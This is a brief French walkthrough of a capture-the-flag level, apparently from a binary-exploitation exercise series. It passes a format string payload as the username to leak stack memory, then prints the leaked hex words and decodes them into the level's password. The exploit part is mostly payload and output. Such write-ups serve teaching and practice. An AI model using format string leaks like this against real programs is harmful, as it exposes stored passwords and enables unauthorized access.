Pour le level02, on utilise une format string attack pour lire le contenu de la stack sur
laquelle le pass est stocké.

L'attaque qu'on passe en username:
%22$08lx %23$08lx %24$08lx %25$08lx %26$08lx
qui nous donne:
756e505234376848 45414a3561733951 377a7143574e6758 354a35686e475873 48336750664b394d
qui est transformée en:
\x48\x68\x37\x34\x52\x50\x6e\x75\x51\x39\x73\x61\x35\x4a\x41\x45\x58\x67\x4e\x57\x43\x71\x7a\x37\x73\x58\x47\x6e\x68\x35\x4a\x35\x4d\x39\x4b\x66\x50\x67\x33\x48
qui veut dire (avec `echo -e`):
Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H